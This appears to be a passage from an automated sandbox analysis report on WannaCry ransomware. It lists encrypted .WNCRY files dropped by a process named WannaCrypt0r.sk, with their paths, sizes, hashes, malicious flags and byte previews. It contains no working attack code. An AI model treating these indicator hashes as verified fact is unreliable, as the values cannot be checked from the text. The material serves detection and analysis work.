                                                  SSDEEP:6144:3Bs7ILBWC8/DEwXB4VvstQPyKqaYqb67acjRsx4g2X+VoK:xHLBkDIfEqm7T85VoK
                                                  MD5:C03C51161BC64D1AA94D0CEFFA788DBF
                                                  SHA1:1BE5756F66A0CEDD7E8459D8FF57021837B32BC6
                                                  SHA-256:F92CCDC5E6FEB40D2B7451EAB1AF40AC15FEAE77F55A3FD568D8DEA14D8475A5
                                                  SHA-512:EE77AA618C0DB5842E8D605B22236376F4B4AE97986F3F02ED2F182D5E61BA7302205E0FD454BAF4E859154424BE8E4A8EE2532E5D81F9EE8E676DAD241D6FAD
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!......=..Bw...L.3@/QZ].:....=I..1`|.I..-..HA..X.I([.5.P1d.<~.c.^...h...|Y.&...#.K.....,.....'2.a...u..7....Pp7.#.d....4..O...d.`(........m..w/..0Ba(O.r...1.....s.|..4:......{@0.|z}.....pt...wj..9.........r.ph.8z...4.u..n.}r.3A......s.[{....*.9.......,......=..,n..+T..d.eqR.U.|.+.K...e.L<.I.l.!.B.^$\..gy.]_ZR...[......w..G.N..=..........Z.=.Abf..W...9.D..=b&......m=E....2.)`t...3...mcg"..y@.:......G.X..7...d.6..|.*m.r.B...2.7.4~....C.;N..jW..R.*.9.R%.6v|....&..Z..p8u..b&>..Y+_.B..K[.e?y..N.......t....+I.o..v.<.Q...yL..Q.Xyk....klW...j.....d......p.[|..#1.q@.c$+"z.=....ed.....6.o*.}}...0J..*.d._Zqo.n.V.|..l.-..c....en+,rnAD.EK(...}!.....l...j..x."..yND..5@..`......*......u+.x....2rg.....Q..zkcm.....L>L....!..6Z.@5.$..Om`...LY'.o#/...5F.A..._...|..'VG.t).zs.H{*.....=..F..{...A(.U..W....#.z$"...y......O..i.uV...[.....)#o.........aX0:...P.i..v.P......iq 9^................=.g.rt....B..R.....).6.7.......Q..z...Er..}....>\IbcF~e.nV....|V/

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20220223140416.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):246824
                                                  Entropy (8bit):7.999235805778599
                                                  Encrypted:true
                                                  SSDEEP:6144:Xevrkpy+mMR5tnqXH1wgiWG1sT/BAaQYs8efn+WTNN8W0uc:XevrkpzR5tnKT/yyaWWTNN8WO
                                                  MD5:9AFE1DC2940457CB891B665DC5524BA7
                                                  SHA1:570B87ED270AA694C6EF3FCC1A0D725B850FC514
                                                  SHA-256:0A21E8605BC9E26D5484DD905D4C47797590C42965E55BDF699E9E312AD03CD4
                                                  SHA-512:FB30E8E722141C36EDAB9F080B2300F2F81F1DDFD1A1C6CDA3886FD8A8953011F0E5103F0945740C7D8F545FA515D13B450613616E7A78F654A95893E96ACE03
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....E..C..M...M.y...Gn..........+N..n.|&.`..c.. x..F!.._w3.(.....~..%8...jM...W.i[=.....o......h}..!..h..O.\Um.V.96'..b.tY...?:GR].dx..$r.K...[..rE....T3...i.N..G....,.....`?..`.."..Xf........[..<...I}.&...n..q...u--B.~.......2..o.f......0<?O.{.................(.o....am..,.w^P...&,...es[R&.l..(.~tl...,.H...+._.......o...)1.P.#.- ...O.$..g.b..}O.;.,.z..-~.K...b"...j}.x........2n4eJ.I..@....T.*?..=p.oQ.2.Q...1{@?va..A/.m..).`............B..pN...._.P.....q.....l2..2.fQ8jok.....O...L`...A..r...;...-.0.!r..k|......\.........+...S....8.|.Sv.g...J..#...t....C..Y.........H.[.F.\...D.w.?.2,..>s.3....XSzg?n.3.N..`\o.sRU...N.]=X./.!g..Q.'./e....H..........5..{Y?;L,.b..4...jN..j.8w.L....q3.8.f...g..`..=K.z....+._........,..,./!..B...1.J..Q.{I...&.m......E[.[.pZ..._.6.F4.R..F...B......:.!f-t..N!v..H]..e5^B.Vq0.Uo.=.....<....f._.g...wy {..].i...ZA...{lw......W..,yq....Fl..$....a2...:.q...g..../5w.Y4.........k.GbD.?~.h...7...2.=..X<.:Y+a.@.

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20230515092412.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):394984
                                                  Entropy (8bit):7.999547824092546
                                                  Encrypted:true
                                                  SSDEEP:12288:kzXaBdvyuzLIjEERpf5R8DjT8Vllf5mXYBkCWbg:kzXij6D00TmIQ0
                                                  MD5:7651F27F5C508E1BA6164550A34DB967
                                                  SHA1:78EAECD1649554C9BADD234C6DC617B4C0470A4B
                                                  SHA-256:F3728037B254E5C8B30632D661F8ABFA87BFEBA37B2D1A2470D4D670088A6635
                                                  SHA-512:73977D984879E41C42F83977A2B02AC800B9934FAEF95A9950E1605EB8B9845AA6676BCF77305E953F519AC77FCE6B0D5544D7BAAECDFC49DD4AB21C0D3C8DF0
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......`g..O......y.....L.........p..tw..F'....6.....1....`A....P?..$)n..'.....&.M.F.30..6.O.{..o...`..$~...|..l..uM...J3.....^.....o....|G*..H.TY..Y......[l.h4.y..?...a.S...&...3..e......<.T.........e..h..K.......qQm.`g{.V.u..p..-.~..&&..w.6.............{|.O.;...q&.8..].....:.e.....".....Ju.!{...u.t....i.........|..H.y.!..;f.l.e.g[I.....b.c..R..)..b~[<.o7..\(7&..Q.%.]..N-~U.Z.sj....J..h....D.{,..6.y$...jx.x.Fb\.s.....yxmn...K9M.<..X....`.C.N....i. :Cfq......CmX.V...,..c.O.PB/42...~....d.&.2....`.+2h(..........y..U.N(.15VF..>.#.......hw...#...!..+ig....hH...;aO]....<,.\.t.,u..O./...J..n...\A.lNb..V.Ye.Y+xL..$...........T.e..Q..1...J.J.........}.53..j/.i\.h.r.d$.?.2g.(.v..Fiv.z.U...iK.<.A~.m..!..|+)..s..vl.R..T....v..c..9.b.I...Y......X.....3@..u1.=.Y........:....$.d....Q6X...v..0;.....T..+..S..y.2.=.$]8.&...1W.i.~.8d[Ok...K$.....q...........O\.....{.C.S.C.r.n..a.D..G[0~Y....x.+....6Z&.~zA..e.P.>...c...y!s3)~K.a9....6..

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask08_18_15_03_36_7371.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1576
                                                  Entropy (8bit):7.861831447405634
                                                  Encrypted:false
                                                  SSDEEP:48:bkbEJdGBWcqVyPaQLIHygEGumf65VNWXXs:obEJdGkceK7hGQ53yc
                                                  MD5:A9F08CAF1D9DD16BD123B6A923E5610E
                                                  SHA1:02FD3CFAAC9A5E8BF81C5B69A4F1AE2EA12ED45C
                                                  SHA-256:F4244DF13DCF48C00E0A02D4A4E203FA47AE14EB12D37E0867B781C19B011767
                                                  SHA-512:3274FE1CD59BA1FFC5B3A9E668C3CBD567993BD37976A1002602525BB8F91CFE1885AC162896A31B5AC8A5EF4FA97CB336D6FF5B4BFA94606737234651B9C6C1
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......*_...EvT6.......1.5Trc@...%/}<2......d.A.CWR....L..V....9.y.s....H.I..i.`@7...G.f]...(....<..%..p...3...vX...AZ............=.[.&.......p..(.EKd.I...u...A6..T6-..D}gF5.?..-.(..1..zB^0...+.5h..(.r.........e.8....5BdC..P....W.........|..J.............Q...j..vT.Ba..D../C|z.9WPM~..M..D.Y.E.?I...Gq.Dm{VYti.1..V..]c...y..J3.....xnppOj4....$...9n......@..s.....q."...Qb.......V..w,..2{.......h......E."U[..?.Z..%~.fww...p.P........E.M^.N6fk...\...u.. v..`9.P.BF.q,.....c.l.6mF5N$]d.....#.....b.c...9.B.....mY.v4....... .)A.R..Y...3.W.m.+.2.0q...Wa$...Zu..h.S..*W.n.tj.1.. \..W+I.=%.....MW....*.P..@u..$...N....pP...qeS....sV........9....Ic)0..~gL.Y............t.S'J...w..K....R..]w...k......iN..(.....wP~.....H....d...s..i.c.z...*.KM.....X. [.0.W..x...H@.+j......I...R..(u<./.xX...p.`..AT..r.\....A......t..o/i.Tj...S.y...5.%.".....Y...g........" B.=..E.?....C.j.......<.W..0}..@....2[...O&.=+[.c....4Z|..+J.C,}....z..bQ..X.|u`..........

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask08_18_15_05_51_5411.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1576
                                                  Entropy (8bit):7.856055905198148
                                                  Encrypted:false
                                                  SSDEEP:48:bkWU1AeexavrhuEEfCyWJdCnPo0JQQQc9pHeES:oWjeAYk9aTKQQQcjHE
                                                  MD5:857513D809629174C2581883E6FB6450
                                                  SHA1:2A94491A1EC2EC095D83B8436D6E39E1989156B3
                                                  SHA-256:D4333E8B1BF7270C4E91B0DFBE7315CF51CBD19EE065DECA49FBD171FEAF3781
                                                  SHA-512:A42A4D6E8AA0BEFA7F351C9EF8BC9F10CE6F7168963F0B2F4EADB51DCE7C6B0586BC171D066FFC7544AF18D007F8D8DEE2C01CAE330EC7AB400232452824D607
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....9....`o.lyc..r1....?3....%%... ] /.J..2...>...j..-;..../VJc.5..b...Q.@.".....KF...2U.f.JW.{..C.L......uE.M...'....}F1.s.f.8...h.Em.=.N.`....H<.$...\n.9....D.c..|}..Z1.....8...|...A.....V..tq..B...d.(.5.6...G..%....v.<.l{S^.e.{R.UP`..X."................'H|Dh-..p.\.L2CX.c...Y.^.t.c...gb.?..>!...lr.u*;.../F....R...>..`.......\[.z .\....j...t..P.>g....2....t..l...........$........*...Vn.@.9j.s...t..0.....0.6.Q...B.N.8........Q.+8'Xv.e.]w.pe.....Z....{...i..|J......t..w...dUY.W.$..0...d..A..Ab..1.a......5..?..en...u.A.W..E..L...D..[.j.j...Iv..Y......Y./....quU,P. .c..$=:.U..y....&.+>.m.zKv..7..b....Y.8..1nI.2D.......g.../.6.y...X..:A.g4.kI.......A....'..Zp....+...._.P.....eqRC.:.v*.-'C...wdf#vZ..,."m&5AJd.C..L0.Y....-.E...A-...M.......L...kF......4T/.H..|Fy...C".+o.*v.yo...A.............R.........E.u.8.....CD{.<..(.U,v...D...~..0.......@.1I..3.K..]Y....{.qP....-...j.......m+.4L\."Ig. ../`&..1...I.....sa..<!.!.....6....Q".

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask08_18_15_37_00_4351.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1576
                                                  Entropy (8bit):7.87972038682944
                                                  Encrypted:false
                                                  SSDEEP:48:bkpbJHhubwta5vnuNl7fHkqsnBAoYwurPZw:onKwta5/uNlLPsJdIO
                                                  MD5:96229D4DAEBE7CD8529A70ED1EEA64D1
                                                  SHA1:75CCB24BA69CDCFF68CEEBA5F596CC5DE217E35C
                                                  SHA-256:11102664BB6CDDD4BFE0FC64526E31B0DB4EACABC1044D9FE5E1467C6FE75F52
                                                  SHA-512:A94F70B9AA880070007812FB9E95C1D8124A095F40F62E099596ED4F81837A5463779AD3386B3295407D5E5148B5B00465485FE17C18CB9E2947D6553643B378
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......n'......;..T%...s....O._R...r.Z...vJ.|c.....B.......=aB.<...yv..=V...z........U.q.K....gb..F...u7.|B?....q_....>...<.v..=.j)..._#..Oz.#.V"[.p[..O ]N1.......4ef.J.i..@.[...~/...w......';`....4y..fi....aq..0.DW....=....>.@UK;.K.g...gB....n{.o.............R...`.dI.....9]...#....?~F.Z......F.A....._a.....@....+..c./..\..J..,<.@U........8JQ...H.s.c..0-.4W.`.`.5.......Air.x ..\.JZ...j..ftB.L<..,.$.gPn.Sj5.|..k...f... ....f...>..C<.....K9a..LA;.j..@.Z)..g.._./.N..A5.M....-.QI......a..b.k....H.+.j.Tm2.Eb9N.t.g...../.a.6....b|~....:..,..YH.H.BE....|....N...j...{2.B$.$!`2<..T..5$t...l.|.......0..s...6f.).z ...LY....+.H..7.S...d..c.L...|...i.\P.Z-.....Y.........r\KWr.:...{.+..P....U.%S..0.qG....6iR>Y.o..7..Pn.zm...#.+....x.!.g...'h.t"yIW4.AP`(...P.M.S.mr.a.c-.5....(...*.z.....J....F.#}....T.!.......w.PW..c..?..c..4....D9.o.u......S..&....H.=.oe............i'...#.H...K......P..4.]G..5.U........h...d.Xl.k..{. .j.#....ZL..........

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.PostInstallationTask08_17_13_19_38_8611.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1880
                                                  Entropy (8bit):7.886700788705434
                                                  Encrypted:false
                                                  SSDEEP:48:bkFc249t6/RSf1rvULFimyQ5Tk5NcjANnD:oFc2/S5cLLOmjQ
                                                  MD5:E7849A91BD3084C39A8F48D0085FB57A
                                                  SHA1:DA86FC6A1AF1C3251285503A7ADAFD449F596529
                                                  SHA-256:59ED471E43B81DAF37EB37BC09A8CB549E47830594C8DBBA5EB4754162C6D905
                                                  SHA-512:617A546DC1CC69AB9C0AEC381FE492BE64B4F34422793871CBE94A5774B5D683D598EEFE5E8052C50EE63AC1A62FC4044BE70455248741F6C0B97D1DFDA75BF2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.... .......!.. ..9....a..F.\.`6.*s..3Pv....T.7.f..@.u>.I....\L>......F.;_=.l;.pC../.!..&..4.-....|..1.}..3...`U&Jb...^..1&G|W....p.......@o...1..usIN>~.u.."........4..Y.9..^^@....+.p.C.[.Qh%.F....g}dR.]f....i...K.,...;}.&...7.....m.J....5..C....5........:...p.g.z._s7('.r.......F...ws.#..}.Gt@zL...._...... .Br.j..7N..6.SC)..1.D....O.7.......Z_iQ.}............G).........B^N!.!.Wwb ....k.Ox$sw...;. .a....S.....]..v.mZ(.........b.75...-.g...!...`/.).p|.FTWB.c...#.!.cXw.>.9.`.%..(..N.!O.j.v..#.!.Sb.j<Wf....R.*S^.A...|.QL.#..+..K...!G..........C^..............-l...cG...%...A.{K.....=am* s..T2VRJ...p.=.....{1.......t....m...Z...`%z$k.....6zU..n.....}o.q.l7..a]B../.v..0.d.?#U#..z...!_...E.jr..O...m..*..S.[_ ..SO!...o.&....J...3h...toB.3..e.<m..S.....^w.,&$.#L>..2.}P.3m?...G.<....^.7.....>._]....<..&.J..`....0S.....4..*0;.y&=.".X...8..f.4.R..?.\b..t._......c..*6....(......c...Z.....uc;.$.h...Y..W.f....?..@").....@...........5=.L`#...w..YS.....

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.PostInstallationTask08_17_13_50_48_4321.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1944
                                                  Entropy (8bit):7.891575439369692
                                                  Encrypted:false
                                                  SSDEEP:48:bkXJZMwaoDEiwdIsc78W7QZBJG5fsL+TU214KCY6k0Df/iF:o5ZMhoDzwdIMW0Z+5fe+TUVY6PDf/iF
                                                  MD5:0F46681101C54D75F113A62A1CAB298C
                                                  SHA1:564E37A5D39E12B3B42EC414E4543B7DDC5C2B3A
                                                  SHA-256:AB4568B7AD70D7AD3EFD09BA72F306E767AAA3085C5F5F32FB8696123BDE1BA6
                                                  SHA-512:6D0431F68D31AFDB015C11F3181CFDB779DE9BE93B48B457CA62EA8FD5C574EBF3F08ED359317F1DD35D07250F327FF825CEA5367F3CA259432CDCB0E6115AFA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......^_...1}.:D...`..c..n.s...EU!<.....(.Ve.8...z..._..d2.=...."..U1..t.2.msv.e.6._>bR4.7.....Na....o.$...b..%#$6'Y....?)..T...g..\^.%..c\^..jp.wJ<oBX.Y..0D..Y8.....t..&T..e9.....#[d...;..a. ......?.xT..N.XU.x..^.C..Td...u..8)....n......$....Is......s.......2.t.7sq..<M......&Q....X+..........J1..:....W.A.....1.0Z#k.m..:>....S..u../.{....|.}..,..8v...7R.n..b.G}.G.).Db...L..VT.....I.M5....q......./g.D3 .v..a....i.oZn2.dA:~.e...o..|.7....6.}l.'<.5W.UZ...k>{..(.%......}.'D..3?.Qb..h......~L.*f.B........N...;....Q..>y.2..$.6O....6..#[b..x..CM.W..S..y..c ;..gt......]..].,W.Q...fq_....N7..L?q...Sc..g'-...J....C..e.-.X..#......YF...........,...m4...o...Hx_.z..........R......gU\.m.)&.....lZ.?.>........c. ...p.....H.\&.%..Uu....3.......AV.1...B....fw.a...R....`.UQ....]`.q ....?.....d...>6....[.J.....no}XE,7#.Il`..>...F..(......kg..q ....c...1..Um..Xb7......|X..O...:.4.......K...B$....n....J...m...^.b]+.s.s{#.t....^.b.i....D.~e.OC..]...

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.PostInstallationTask08_18_17_07_25_4954.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1576
                                                  Entropy (8bit):7.872312578087441
                                                  Encrypted:false
                                                  SSDEEP:48:bk8+v1+DId81fv8MvylWxl4TZLfUg2Br0:o8+N+DI2v62l4ZLfLSA
                                                  MD5:6B4D8042C164571BBFF370D3230F3357
                                                  SHA1:0822464120215F94376C52E4EEFC9E8F7493F587
                                                  SHA-256:B8FF8B18CFE041002A058CCE5BC09DBCDE097F33FCE2BCFEAC221AE173AC8C14
                                                  SHA-512:28C7F05C1AB77D9F6C76D782A3FD28C2D4D425BD103D8807999BC70FAA2BD668B65401E6B8A1BFF5E8451FB1473FA32092E73734C0C6203BAA2BF6E1DD25F70B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....@.......w...p.E:X{...2.....)........=d@....m...2I...~..%...A.7F.bl:J$-.C........%....4.?#L.>......X..(..3..O..L.F5..... h.%w.....n...ZqJK./..; .AV.....P]..=.y....a...:....~O....!...[.e...T...]...vS%d. ...,.E..k.l..K..]7.......$..45.?............g..*...*="pyi.F.g..x>.N.m{....)..h..x.2U.V.q.T.*...6..[.YT.T3... .d 0n+......K.@...1.!....=.$U..].n..\Zw\=~..Z...IN.&.{...~.......8..b.p...50.=B..1.W.ZL)....2C>g<@s9X.-....0.....QI@...............l>.....c.`.>(,V...?........9...w.|....U..Q......E.....%l...K]..:..-.u`...5.......)$...d....`. .z..Cl2F..#.......,W(.%....V.,..........k8!..W..v.."...o.:...).a...b.g..7.K%P...U_..'.3......\Vs/..I...70.."u...^....0.cc.2/...LrC(..B..1..X.).%.../.9...#.92..z...xc.C.b......A...R.R..4.k...Lg..Y...R.x.vA8....V.......8.ncu.,...c...r..$7+..(xT.$=..9."B....r.r.d.....aX3G...T.%*k..F....I%.....#n...u....,Q..'&..R..*...... .........)....!;.f.o..A.S.._.C....1..:.$..Jn..U...@.....v'S...^......

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\appsglobals.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):352008
                                                  Entropy (8bit):7.999443577813371
                                                  Encrypted:true
                                                  SSDEEP:6144:5NNhIDmuHqItN6E2LbaY7LcY0UlrJPyHdi35z1pBEkABXCIJcf5fbj:5ODhHq8N6E0aYc0d6UpbBcjJ+F
                                                  MD5:600554237B50A462CDA07251FA11552B
                                                  SHA1:D4901F0E240548E2F7FDB16B4FE091275BEC9254
                                                  SHA-256:DE03E76B11C7C9F7904B9B342B69A369E4FDAE2CC92B658AEA0E3BE485DCDFEF
                                                  SHA-512:1AADA2C4ED526F5BFDD09325800348D51B49C910B829E5038ED920903D03AE275CC420A77D10955422C788BD8EF3ECC13CEBBCA802E5AE61CCEBF02BE25196AE
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....~.S.[0..JFIS....vQ;.......?f..&."...I..ah....A......m..._i......fc..(-\hozsf.....0..J.&.)......~..A.q.:@..I-n.v.mM.....h'F.4f..P.T....`.'..E..z....b......~J.I.9u..v5..d.&..8RM4...`.b...}.4...........2t.-....9......:m0M..?.B.o....@i..y,.1K4.x........]......%.c.&D....\..`d.a...fg2.6.....C.balo..,t..yfX}..........f.<...J...j.Hu..@W-.\...ZoGd....i.]...)}..@....qD2.4.k..q7...e.*.@>?.}1..n}A...5.@Z...9-..n(fj.)..l>BQ...7..7.J".D.@>.`zO..8x....].*....B..u9.9!.d..P.........o...>.m.}.;n....~.....T.o.<....b.?..`4.l.`..q1 ..k.....za.]..JR9.{b..B.1.cmz`....h...].M6..#]{u!w....?....B.W./.-l-.....s......i..=.F3..P..[E.....:..J.......?..3(.;.......Bb.-% .o.R)......M.....R...jI..`......k.J.T@....'...QVdf.CH.......9c.3.-........O.IS}{V<......j....).G@.~.X`.......@..W....lN-...Px..]...x.O.h.UhU<...X.....u..T/....,6o.[..D.@!z;..o.C....H.A.F<...H..0..)....EK........ ..y.>...bHm.bb.....UD)..!g.0.Ck.!. .k..%/.5......[.-$...O..{.m....U....U.|..

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\appssynonyms.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):243784
                                                  Entropy (8bit):7.999279212841311
                                                  Encrypted:true
                                                  SSDEEP:6144:rW5Y82drj5y30OM6zKbXbti9EYXlLs9/4WuET4y/m32gOu:rWa8qrc3u6ohIPloH42m32g1
                                                  MD5:4ED02A856E11E67A95A8A5B1CB674C7C
                                                  SHA1:9A4127BED213906B845FEA489136738ADE2BF463
                                                  SHA-256:DA24EB646E000233AEDF406A80E87CF6940F92D689F2DE93B395CC74E38B39FC
                                                  SHA-512:C26AFD461808E0CBE0C2072FA886D800056DB5AC461BE7C4C8FA771D700AF22EDFCF000851C78E0C9BF37C1E4F88377694F254C2E5726A9CD4F8D37E56079748
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....L7=...0.4.xF....c....Wg.NI..QO.P{ES.c...?..S..h:`.C{..(..0.y:..`..+=..bw.3.X.VW...y.d2n7...Pe...=H.F.N..N..^&.......Z..<W..........K..R..N1 %...k.......]l]q[B.l.&.h`.%..F2...C.z...c2.9.. ....4.......4 .......,.]....'.o0_R.....*..@v........O.....&.......t.....Pb.#f.Y1$z..>......^c...5.4A..$....U........i.-.E.<..Y.p..l...^bl>%..\...q..)...........d....:.....D...I"].e.`2.Z...7..6<._.(..D..m..!.{.D....-...@..U...>.fD.r8.._-.._.U.-.....v.)...N..8..._.....)..M...6.!.Vt.... .*..6'.e...tDmv.@..../..s. =W.b..u...1.o......U4.......S....5?..H...U...Q.w..../.VP..*e..gzJ~]._...u.......?...V.N...............r.. 7.l.n.....:%L:t.;..a....;ja.jb..+CdX....lf/...m0%R72.Pnz.Z.&.?.%&.E-......&3Ik.M&..g03.d.Dx.......o.,...Ft....7<.O_d.b.`..*L...X.s..:f...C52..Z.."...X-...S}.B..d....X...gLUk.n....f.Ml.W..v....1..XeQ9.....;w..?....ma.......z.C.Q,....v.........^.h,........E.....|.H..J.B...7IUz............,..Q.....-h.......".!k......K...h{.r)9.l.q>._"

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_FT_Server_20210930121453.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):25192
                                                  Entropy (8bit):7.992575960635192
                                                  Encrypted:true
                                                  SSDEEP:384:luBo4Gay83W3BHocGqJffNowX7e3KJjxFULLDRWU25cBa5V7Qs6yXwsHQHbd9Z58:WLGQG3BrlJNow7xUPecBa5VHXzm76fuM
                                                  MD5:AA3B20898E69D0BBB0CC0D036FB984A9
                                                  SHA1:BECDD345F2D8CAEE2B1B825F8FFFB3633B88B1ED
                                                  SHA-256:AE9B4FA858EE57B0ECEA3EEF286DD269DC810F0464EB0AEB6D16A0014BD24B26
                                                  SHA-512:91504204389DE618B0F4879D51F3B41E1EE463913826E09146ECEE023E1E6E25866FAB24ED238C36B2E039839691ABAB088CCADD7CD76F2D48A0EA0C66D98F3A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....K.$.......J.....tR......h...uzks8...}Q...B.W'.&J.Di+.2l..0@...w..f@.."IjI......R...C...\&5Z..R"..BK..........Ai..)....=.;.y<!......:...c........p..!..y.......I..)..m...g.G.....~{..P7...I.......U..3.L..i.m..|w.B.b..G..#0....y..... 7b.dS..Y.....Ba.......+.......e.f..V.....K.g.."d......1"|d..|...=(.AO..?..`..{.g........2Gl'....S.. w....8z. ....$.o|.t=B8.+.....V..G...*...<.w..P..V..7...}I`.M.|.K......W..Aq^.M....L.l/..5n.cl..+^....=Ug..aMw..~...!.<....;.\g...lx.8.(Q.n.%n....m.V.! ..._8..6[-xN. .4.L....6.CH{.F.@$4.P...r...M..P}.`.........PZnF!....h..Y...+m.R~>.x.K8.....W,N"............l#3....o..=..4."0....L..e.....:.J.bn..S....J0!.......fh...e.l>..:B),.:E.Mi@.,-L!.<..*.0:9...-..i.x.{F..k......J.p....J.c{/`...C.p.....#V....|f4.....(..6wB...4us?..#.^.:}.,O3.u.....&..`/=.....?...cBs.S..|...........r....,...u?42....WK..1..lq.....MC.m.z......X..B....L<....i!...p.gxD..I.-H.....Y0..o....chjO.....Jk....W..."fL.... t.]...^3;.`.j.f...\..W@.

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_FT_Server_20220223140416.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):25192
                                                  Entropy (8bit):7.993655517996397
                                                  Encrypted:true
                                                  SSDEEP:384:GQoNgVsIbhHFFA0fqxtSFYCSWjxz0c8rDM6Iaq5tregyu4jAlJ9v1UIyZSaC:LoysiLqwdzUvM6IaAtCAl3+Xg
                                                  MD5:E96E2364C51CFC4D6BA13ABAD2DD54E9
                                                  SHA1:EF4F2AA9E7398991751D86864873D2F93CF384C6
                                                  SHA-256:77A3F7069AF8329E61BE21ABA45DA76B8E74F3BAB8422A0ACD1561767CBF9055
                                                  SHA-512:E42DCE2A1BC0C2C2DF7CBA0F405A354BD4D03F312629D1773785AF9186F7EB7EBA907FA441DB494EE65ECC192E00B51885BE6AE18EA54360A9DCD69B5B427179
                                                  Malicious:true
                                                  Reputation:unknown
